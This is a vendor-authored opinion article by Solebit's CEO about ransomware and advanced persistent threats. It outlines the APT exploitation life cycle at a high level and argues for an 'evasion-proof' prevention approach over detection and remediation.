When it comes to persistent malware... prevent, don't remediate

(Image credit: Image Credit: Andriano.cz / Shutterstock)

There’s been a lot of buzz about ransomware lately, and rightly so. Its prevalence grew by 59% in 2017 and fourth quarter figures demonstrate that it’s not slowing down. It’s scary — losing data means losing money, business, intellectual property, and customers. Even more alarming, ransomware attackers are targeting public life — municipal systems, schools, hospitals, and other vulnerable high stakes targets. Most of us find it easier to understand ransomware and what motivates attackers — it makes for a better story than nefarious shell scripts and remote protocol exploits. 

However, ransomware and other forms of malware, go far beyond simple exploits for financial gain. They reinforce, and sometimes provide distracting cover for, Advanced Persistent Threats (APTs). These prolonged, multi-stage attacks are carried out by criminals and state-sponsored hackers for the purposes of espionage, credential and data theft, IP theft, fraud, widespread disruption — or some combination thereof. APT-style attacks are rising at an exponential rate. A vast industry of cybersecurity products, which go far beyond early-generation anti-virus and firewall solutions, has sprung up to combat and address these new threats at the various stages of the exploitation life cycle.

Though APTs may vary significantly from each other, there’s one clear common denominator that is at the heart of every successful attack — the ability to infiltrate a network, dwell undetected, and execute malicious actions. Traditional defenses, even the most advanced ones such as Sandboxing, have all been based on the assumption that advanced techniques will be able to detect ‘malicious intent’ and separate it from ‘good intent’. 

This game of cat and mouse is the essential dynamic shaping the security industry at the moment. But the attackers too often prevail, because they successfully evolve their techniques to work around heuristics-based detection. By nature, traditional defense technologies have a high rate of misdetection and false alarms, obscuring vulnerabilities and creating further problems for maxed out security teams.

To invert this frustrating and costly dynamic, we need to identify a “weakest link” common to most cyber-attacks that could give defenders the upper hand.

Common ground

In order to establish a beachhead, attackers need a way to install a ‘piece’ of executable code on a machine in the target network. They will use any number of methods to get a legitimate user to access and activate malicious content (spear phishing). To avoid detection, the executable code (aka ‘shellcode’) is hidden in data objects (office documents) and executed by exploiting vulnerabilities in common applications. 

The impact of these infiltrations has been staggering and continues to spread. According to Cybersecurity Ventures, global cybercrime damage costs will hit $6 trillion annually by 2021. Spending on cybersecurity products and services will add up to more than $1 trillion over the next 3 years. Meanwhile, millions of cybersecurity jobs remain unfilled due to skills shortages and insufficient educational pipelines. 

It's about prevention, not remediation

APTs continue to use a familiar route to achieve exploitation. According to Mandiant’s M-Trends, details of the exploitation life cycle can be summed up as follows: 

  • Step 1: Reconnaissance
  • Step 2: Initial Intrusion into Network
  • Step 3: Establish Network Backdoor
  • Step 4: Obtain User Credentials
  • Step 5: Install Various Utilities 
  • Step 6: Privilege Escalation / Lateral Movement / Data Exfiltration
  • Step 7: Maintain Persistence  

Step 2 –  the initial intrusion –  remains the critical step for APT operators. Gaining a foothold in the target environment is the primary goal of the initial intrusion. Once a network is exploited, the attacker usually places malware on the compromised system and uses it as a starting point or proxy for further actions. Malware placed during the initial intrusion phase is commonly a simple downloader, basic Remote Access Trojan, or a simple shell. The problem is that few cybersecurity tools can detect shellcode using dynamic packers for which no known signatures or patterns are available.

It’s clear that preventing an intrusion early – before the need for costly remediation – is the best (and cheapest) practice for fighting APTs. In 60 percent of cases, attackers are able to compromise an organization within minutes, but it takes most businesses about 197 days to detect a breach on their network, causing remediation costs to skyrocket.

Detecting the evasive

Despite considerable advances and investments in security, attackers still possess the edge, particularly in zero-day attacks. Traditional cybersecurity software is often counterproductive because once it identifies a malicious piece of content, it proceeds to analyze it in situ – thereby exposing the environment it is supposed to contamination and compromise. In an attempt to keep ahead of prevention itself, you need an elegant security protection architecture that is evasion-proof. 

An evasion proof architecture systematically scans for hidden code instructions – or any other commands that might indicate malicious intent – and will not open or execute incoming files. By looking at the code vs. the exploit within, no doomsday device will be set off and the platform can catch any suspicious code, place it in quarantine and review at a later time. Ultimately, malicious code does not get to the point of evading detection because it never gets a chance to execute itself and spread throughout the network. 

Similarly, the evasion-proof approach requires analyzing and interpreting scripts, evaluating every single statement line by line. Every possible flow of execution, including conditional branches has to be exposed and normalized. 

When it comes to malicious URLs, this method accurately detects and differentiates between hyperlinks and automatically invoked remote objects, yielding information on the purpose of every remote object and its behavior. Evasion-proof analysis determines the type of embedding used — without needing to fetch the actual remote file or object — in order to figure out its level of maliciousness in real time, and block even the most evasive malware.

The task of evaluating heuristics scores, behavioral anomalies, false positives, and false negatives quickly becomes an unmanageable burden to security teams already stretched thin. And by the time the analysis is done, the malware could have found its way into your network. By not relying on underlying technology stack variations or requiring a carefully curated environment for runtime analysis, an evasion-proof architecture can be more effective in stopping today’s attackers — and protecting against new forms of attack that will certainly be deployed in the future. 

Boris Vaynberg, CEO and Co-Founder of Solebit 

Boris Vaynberg

Boris Vaynberg is CEO and cofounder of Solebit. He brings more than a decade of experience in leading large-scale cyber- and network security projects in the civilian and military intelligence sectors. He has more than 12 years of working experience.